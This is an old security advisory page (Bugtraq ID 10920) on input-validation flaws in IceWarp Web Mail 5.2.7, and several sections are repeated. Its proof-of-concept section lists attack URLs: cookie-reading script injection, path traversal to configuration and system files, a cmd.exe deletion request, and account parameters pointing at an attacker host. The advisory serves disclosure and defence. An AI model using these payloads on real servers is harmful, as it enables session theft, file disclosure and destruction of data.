IceWarp Web Mail Multiple Remote Input Validation Vulnerabilities
BID:10920
Info
IceWarp Web Mail Multiple Remote Input Validation Vulnerabilities
| Bugtraq ID: | 10920 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 11 2004 12:00AM |
| Updated: | Aug 11 2004 12:00AM |
| Credit: | Discovery of these vulnerabilities is credited to ShineShadow <[email protected]>. |
| Vulnerable: |
IceWarp Web Mail 5.2.7 IceWarp Web Mail 3.3.2 |
| Not Vulnerable: |
IceWarp Web Mail 5.2.8 |
Discussion
IceWarp Web Mail Multiple Remote Input Validation Vulnerabilities
IceWarp Web Mail is reported prone to multiple input validation vulnerabilities. It is reported that these issues may be exploited by a remote attacker to conduct SQL Injection, Account Manipulation, Cross-site Scripting, Information disclosure, Local file system access, and other attacks. Few details regarding the specific vulnerabilities are known.
These vulnerabilities are reported to affect all versions of IceWarp Web Mail prior to version 5.2.8. The discoverer of these issues has reported that not all of these vulnerabilities were fixed in IceWarp Web Mail version 5.2.8.
IceWarp Web Mail is reported prone to multiple input validation vulnerabilities. It is reported that these issues may be exploited by a remote attacker to conduct SQL Injection, Account Manipulation, Cross-site Scripting, Information disclosure, Local file system access, and other attacks. Few details regarding the specific vulnerabilities are known.
These vulnerabilities are reported to affect all versions of IceWarp Web Mail prior to version 5.2.8. The discoverer of these issues has reported that not all of these vulnerabilities were fixed in IceWarp Web Mail version 5.2.8.
Exploit / POC
IceWarp Web Mail Multiple Remote Input Validation Vulnerabilities
The following examples are available:
http:// www.example.com:32000/mail/accountsettings.html->Add->”Account name”,”Incoming mail server”,”User name” = <script>alert(document.cookie) </script>
http:// www.example.com:32000/mail/search.html->”Search string” = <script> alert(document.cookie) </script>
http://www.example.com:32000/mail/viewaction.html?Move_x=1&user=../../hacker
http://www.example.com:32000/mail/viewaction.html?messageid=cmd.exe&action=delete&originalfolder=c:/winnt/system32
http://www.example.com:32000/mail/viewaction.html?messageid=....//....//config/settings.cfg&Move_x=1&originalfolder=c:/Program%20Files/Merak/html/mail&user=../../html/mail
http://www.example.com:32000/mail/attachment.html?user=merakdemo.com/admin&messageid=20040801&index=3&folder=inbox
http://www.example.com:32000/mail/accountsettings_add.html?id=[sessionid]&Save_x=1&account[EMAIL]=hacker&account[HOST]=blackhat.org&account[HOSTUSER]=hacker&account[HOSTPASS]=31337&account[HOSTPASS2]=31337&accountid=[any text with special characters]
http://www.example.com:32000/mail/folders.html?id=[sessionid]&folderold=....//....//....//….//….//winnt&folder=....//....//....//….//….//linux&Save_x=1
The following examples are available:
http:// www.example.com:32000/mail/accountsettings.html->Add->”Account name”,”Incoming mail server”,”User name” = <script>alert(document.cookie) </script>
http:// www.example.com:32000/mail/search.html->”Search string” = <script> alert(document.cookie) </script>
http://www.example.com:32000/mail/viewaction.html?Move_x=1&user=../../hacker
http://www.example.com:32000/mail/viewaction.html?messageid=cmd.exe&action=delete&originalfolder=c:/winnt/system32
http://www.example.com:32000/mail/viewaction.html?messageid=....//....//config/settings.cfg&Move_x=1&originalfolder=c:/Program%20Files/Merak/html/mail&user=../../html/mail
http://www.example.com:32000/mail/attachment.html?user=merakdemo.com/admin&messageid=20040801&index=3&folder=inbox
http://www.example.com:32000/mail/accountsettings_add.html?id=[sessionid]&Save_x=1&account[EMAIL]=hacker&account[HOST]=blackhat.org&account[HOSTUSER]=hacker&account[HOSTPASS]=31337&account[HOSTPASS2]=31337&accountid=[any text with special characters]
http://www.example.com:32000/mail/folders.html?id=[sessionid]&folderold=....//....//....//….//….//winnt&folder=....//....//....//….//….//linux&Save_x=1
Solution / Fix
IceWarp Web Mail Multiple Remote Input Validation Vulnerabilities
Solution:
The vendor has released an update to address these issues. The discoverer of these vulnerabilities has reported that this fix does not address all of the reported vulnerabilities:
IceWarp Web Mail 3.3.2
IceWarp Web Mail 5.2.7
Solution:
The vendor has released an update to address these issues. The discoverer of these vulnerabilities has reported that this fix does not address all of the reported vulnerabilities:
IceWarp Web Mail 3.3.2
-
IceWarp IceWarp Web Mail 5.2.8
http://www.icewarp.com/Download/
IceWarp Web Mail 5.2.7
-
IceWarp IceWarp Web Mail 5.2.8
http://www.icewarp.com/Download/
References
IceWarp Web Mail Multiple Remote Input Validation Vulnerabilities
References:
References:
- IceWarp Homepage (IceWarp)
- IceWarp Web Mail For Windows 2003/2K/XP/NT/9x/ME Release notes. (IceWarp)
- Multiple vulnerabilities in Icewarp Web Mail 5.2.7 (ShineShadow
)